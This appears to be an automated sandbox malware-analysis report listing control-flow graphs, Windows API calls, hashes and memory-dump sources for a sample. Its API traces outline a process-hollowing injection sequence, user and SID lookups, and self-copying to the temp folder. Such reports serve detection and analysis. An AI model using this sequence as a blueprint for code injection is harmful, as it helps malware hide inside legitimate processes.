                                                                                                                                                                                      control_flow_graph 365 1049c70-1049cf1 call 1055760 call 1042be0 GetTempPathA 370 1049cf8-1049cfd 365->370 370->370 371 1049cff-1049d93 call 1055ac0 call 1055c10 370->371 377 1049dc4-1049e3a call 1055760 call 1042be0 call 1055f90 call 1055c10 371->377 378 1049d95-1049da4 371->378 398 1049e3c-1049e4b 377->398 399 1049e6b-1049e93 377->399 379 1049da6-1049db4 378->379 380 1049dba-1049dc1 call 1057335 378->380 379->380 382 104a135 call 105b98e 379->382 380->377 389 104a13a call 105b98e 382->389 393 104a13f-104a16c call 1055640 * 2 CopyFileA call 1045000 389->393 416 104a1bd-104a1bf call 105a74f 393->416 417 104a16e-104a1b5 call 1055720 call 1055760 call 1055720 call 1043990 393->417 401 1049e61-1049e68 call 1057335 398->401 402 1049e4d-1049e5b 398->402 404 1049ec4-1049f10 GetModuleFileNameA 399->404 405 1049e95-1049ea4 399->405 401->399 402->389 402->401 410 1049f17-1049f1c 404->410 408 1049ea6-1049eb4 405->408 409 1049eba-1049ec1 call 1057335 405->409 408->389 408->409 409->404 410->410 411 1049f1e-1049f4a call 1055ac0 call 10560e0 410->411 428 104a037-104a040 411->428 429 1049f50-1049f74 call 105a81c 411->429 423 104a1c4-104a1c9 call 105b98e 416->423 450 104a1ba 417->450 433 104a071-104a095 428->433 434 104a042-104a051 428->434 446 1049f76-1049f94 call 105a8aa call 105ab37 429->446 447 1049f9c-1049fc0 call 105a81c 429->447 440 104a0c6-104a0ea 433->440 441 104a097-104a0a6 433->441 437 104a067-104a06e call 1057335 434->437 438 104a053-104a061 434->438 437->433 438->423 438->437 444 104a0ec-104a0fb 440->444 445 104a11b-104a134 call 1056cc2 440->445 442 104a0bc-104a0c3 call 1057335 441->442 443 104a0a8-104a0b6 441->443 442->440 443->423 443->442 452 104a111-104a118 call 1057335 444->452 453 104a0fd-104a10b 444->453 470 1049f99 446->470 463 1049fd0-1049ff0 GetFileAttributesA 447->463 464 1049fc2-1049fcb call 105a8aa 447->464 450->416 452->445 453->423 453->452 468 1049ff6-104a00d CreateDirectoryA 463->468 469 1049ff2-1049ff4 463->469 464->416 472 104a013-104a02d GetFileAttributesA 468->472 469->468 469->472 470->447 472->428 473 104a02f-104a031 472->473 473->393 473->428
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 01049CCE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PathTemp
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2920410445-0
                                                                                                                                                                                      • Opcode ID: b9b2d5cbe931c52613cb2e3cb7d7dbf70619b5df4bccd741519eab8cd646d88a
                                                                                                                                                                                      • Instruction ID: 309242c936afd56446f1aa4e1c86ffe93b214a15af3f8f675a2b7597be7cfbba
                                                                                                                                                                                      • Opcode Fuzzy Hash: b9b2d5cbe931c52613cb2e3cb7d7dbf70619b5df4bccd741519eab8cd646d88a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D71C2F09042588BEB24DB24CD847DEBB75AB51308F5481E8D68927286DB751FC8CF99
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 474 105bf0d-105bf14 475 105bf16-105bf18 474->475 476 105bf19-105bf20 call 1060366 call 1060707 474->476 480 105bf25-105bf29 476->480 481 105bf30-105bf39 call 105bf60 480->481 482 105bf2b-105bf2e 480->482 488 105bf40-105bf47 481->488 489 105bf3b-105bf3e 481->489 483 105bf54-105bf5f call 105d301 482->483 490 105bf4c-105bf53 call 105d301 488->490 489->490 490->483
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                      • Opcode ID: a6445258777a0446eca737af28b8d5897cf44778dffbedaa362ad6b09e1a3e63
                                                                                                                                                                                      • Instruction ID: 68475f5a7cc56bd652dee1181082e5efa6e5a051c7af1cc60b394e6867b856c1
                                                                                                                                                                                      • Opcode Fuzzy Hash: a6445258777a0446eca737af28b8d5897cf44778dffbedaa362ad6b09e1a3e63
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BE0E532D1551641EBE2663EAC002AB27C65B81239F224356ECD4C60C8DF2674028B61
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 493 105d15f-105d185 call 105cf35 496 105d187-105d199 call 1062341 493->496 497 105d1de-105d1e1 493->497 499 105d19e-105d1a3 496->499 499->497 500 105d1a5-105d1dd 499->500
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __wsopen_s
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3347428461-0
                                                                                                                                                                                      • Opcode ID: ee0e40c729b525923b6ffc6146a8a693d64b628832cc03a5a3dab42c2275cf2d
                                                                                                                                                                                      • Instruction ID: fe3c64f231f91be1d04671880cd1d7334518ceba809f33389b9d9d6f2b71503f
                                                                                                                                                                                      • Opcode Fuzzy Hash: ee0e40c729b525923b6ffc6146a8a693d64b628832cc03a5a3dab42c2275cf2d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C111571A0420AAFCB05DF58E94099B7BF9EF48304F1440A9F849AB251E770EA11CBA8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 501 105ea07-105ea14 call 105f5d6 503 105ea19-105ea24 501->503 504 105ea26-105ea28 503->504 505 105ea2a-105ea32 503->505 506 105ea75-105ea81 call 105d301 504->506 505->506 507 105ea34-105ea38 505->507 508 105ea3a-105ea6f call 105e1b4 507->508 513 105ea71-105ea74 508->513 513->506
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0105F5D6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0105DD94,00000001,00000364,00000006,000000FF,?,?,01057F22,?), ref: 0105F617
                                                                                                                                                                                      • _free.LIBCMT ref: 0105EA76
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                                                      • Opcode ID: f37bf10e86b648c3fef1a1cd24242da2b753fab306989087883b6d1091671d77
                                                                                                                                                                                      • Instruction ID: 8b81319db390c988d0f7825ecfe7ceb9020e2e8907ed06f96f305a3e923cf67b
                                                                                                                                                                                      • Opcode Fuzzy Hash: f37bf10e86b648c3fef1a1cd24242da2b753fab306989087883b6d1091671d77
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E0126726003166BC361CF68C8849DAFB98FB04370F000669E9C5A76C0E7706901C7A4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 514 105a833-105a83e 515 105a855-105a862 514->515 516 105a840-105a853 call 105b4a2 call 105b97e 514->516 518 105a864-105a879 call 105d734 call 105d517 call 105d4f0 call 105d3c7 515->518 519 105a89d-105a8a6 call 105ce38 515->519 527 105a8a7-105a8a9 516->527 533 105a87e-105a883 518->533 519->527 534 105a885-105a888 533->534 535 105a88a-105a88e 533->535 534->519 535->519 536 105a890-105a89c call 105d301 535->536 536->519
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 4afb52784e6da40e6d1d91f4d12749e424352b18ec79f8588162f7351553661c
                                                                                                                                                                                      • Instruction ID: e28c90f28deeb425e4b8067c5274f8eeb34217f9d95c03983402a7cab0328279
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4afb52784e6da40e6d1d91f4d12749e424352b18ec79f8588162f7351553661c
                                                                                                                                                                                      • Instruction Fuzzy Hash: D7F0F432601A11DBD7A226A98C00BFB369D9F92338F040756EDE5931D0CE34E4038BA5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 539 105ab37-105ab43 540 105ab45-105ab4e call 105e348 539->540 541 105ab4f-105ab7b call 105aa80 call 105a9e0 539->541 548 105ab82-105ab85 call 105e348 541->548 549 105ab7d-105ab80 541->549 552 105ab8a-105ab8b 548->552 550 105ab8d-105ab91 549->550 553 105ab93-105ab9b call 105d301 550->553 554 105ab9c-105aba0 550->554 552->550 553->554
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 0105AB96
                                                                                                                                                                                        • Part of subcall function 0105E348: DeleteFileW.KERNELBASE(0105AB8A,?,0105AB8A,?), ref: 0105E350
                                                                                                                                                                                        • Part of subcall function 0105E348: GetLastError.KERNEL32(?,0105AB8A,?), ref: 0105E35A
                                                                                                                                                                                        • Part of subcall function 0105E348: __dosmaperr.LIBCMT ref: 0105E361
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DeleteErrorFileLast__dosmaperr_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3353641461-0
                                                                                                                                                                                      • Opcode ID: 1df9cd68a77b5a31d4b235192f488869e1abc13c4e27f6fc00f3f629f7c34d6c
                                                                                                                                                                                      • Instruction ID: b62791ee3f4c959b74c9452d0d4d7d7fffbf1b9cae85fb039ab30d679fc397c9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1df9cd68a77b5a31d4b235192f488869e1abc13c4e27f6fc00f3f629f7c34d6c
                                                                                                                                                                                      • Instruction Fuzzy Hash: EA016271D0121AAEEF81ABAC98057DFBFF99B04214F1446A6ED95E31C2E6708A4087D0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 557 10622d3-1062307 call 105aa80 call 105a9e0 562 106230e-1062323 call 1062361 557->562 563 1062309-106230c 557->563 568 1062328-106232b 562->568 564 106232d-1062331 563->564 566 1062333-106233b call 105d301 564->566 567 106233c-1062340 564->567 566->567 568->564
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                      • Opcode ID: ba816259046d0be75618ad59585a9379a16cd9c489139ff9f294c9ae352ba751
                                                                                                                                                                                      • Instruction ID: b6e6f002bb9b2d86dfab5e93ef0d2d3e9ad5842a73e71fe0f5bdeca603f7b1f7
                                                                                                                                                                                      • Opcode Fuzzy Hash: ba816259046d0be75618ad59585a9379a16cd9c489139ff9f294c9ae352ba751
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B014F72D0116AFFCF41AFA88C019EE7FB9BF18210F144165EE54E2191E7318A20DB90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 571 105f5d6-105f5e1 572 105f5e3-105f5ed 571->572 573 105f5ef-105f5f5 571->573 572->573 574 105f623-105f62e call 105b4a2 572->574 575 105f5f7-105f5f8 573->575 576 105f60e-105f61f RtlAllocateHeap 573->576 582 105f630-105f632 574->582 575->576 578 105f621 576->578 579 105f5fa-105f601 call 105c981 576->579 578->582 579->574 584 105f603-105f60c call 105b9f9 579->584 584->574 584->576
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0105DD94,00000001,00000364,00000006,000000FF,?,?,01057F22,?), ref: 0105F617
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                      • Opcode ID: ef7e184883ecac42aafc5869a5654669244a339e8e6eebea98639827c4355557
                                                                                                                                                                                      • Instruction ID: 2a07ebaf33235aa9500e2036efd454c076053d7525a878fb5171bbab1c910959
                                                                                                                                                                                      • Opcode Fuzzy Hash: ef7e184883ecac42aafc5869a5654669244a339e8e6eebea98639827c4355557
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AF0B432644227A7ABE25A3AD805A9B7B9DAB496B4B184051EEC4D71A0CF28D50086B0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,0106240A,?,?,00000000,?,0106240A,00000000,0000000C), ref: 01062037
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                      • Opcode ID: 30fe853d6ae5e322169ff8689862236e6d9c382293afaf96e6a76ec9330d7bde
                                                                                                                                                                                      • Instruction ID: 294e9cd30eb0c0c3555eee0b9fc830a93c2cc6ff56c68bc31fa9d3cb5af85619
                                                                                                                                                                                      • Opcode Fuzzy Hash: 30fe853d6ae5e322169ff8689862236e6d9c382293afaf96e6a76ec9330d7bde
                                                                                                                                                                                      • Instruction Fuzzy Hash: D3D06C3200020DFBDF128E84DD46EDA3FAAFB48714F014000FA5856020C736E822AB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01043776
                                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 010437DB
                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 010437F4
                                                                                                                                                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 0104380F
                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 01043833
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0104384E
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01043855
                                                                                                                                                                                      • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0104387D
                                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 0104389E
                                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 010438E2
                                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 0104391E
                                                                                                                                                                                      • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 0104393A
                                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,?,00000000), ref: 01043946
                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 01043954
                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01043975
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                                                                                                                      • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                                      • API String ID: 4033543172-1522589568
                                                                                                                                                                                      • Opcode ID: bbea593937e51b9041ac1cf82c8492c924592dbc71cdd337b45d960eda7c0ad5
                                                                                                                                                                                      • Instruction ID: 2bc4e37d237f0a0bf020c7ad988b2b003578fd295033dd8c8e667dfe1cc5d306
                                                                                                                                                                                      • Opcode Fuzzy Hash: bbea593937e51b9041ac1cf82c8492c924592dbc71cdd337b45d960eda7c0ad5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 76517C75A00318EFEB219F54DC85FEABBB4FF08701F1000A5F689AA191D776A990CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 01043032
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 01043047
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0104304A
                                                                                                                                                                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 01043058
                                                                                                                                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0104307B
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 01043086
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 01043089
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 01043099
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0104309C
                                                                                                                                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 010430C6
                                                                                                                                                                                      • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 010430D9
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 010431D5
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 010431DE
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010431E3
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 010431E6
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010431ED
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 010431F0
                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 010431F5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3326663573-0
                                                                                                                                                                                      • Opcode ID: 6642153490407dc57743c8955d6990f46ef9b078530ffb5767605619c49cb31d
                                                                                                                                                                                      • Instruction ID: 01a743f7e16894753432fe461f39fdfc36c571fd1f8eda331a5e9c4236b4dd13
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6642153490407dc57743c8955d6990f46ef9b078530ffb5767605619c49cb31d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 347180B1D00219AFEB24DFA8CC84BEFBBB9FF48310F004569E955A7250DB359905CB60
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 010613B7
                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 01060F6D
                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 01060F7F
                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 01060F91
                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 01060FA3
                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 01060FB5
                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 01060FC7
                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 01060FD9
                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 01060FEB
                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 01060FFD
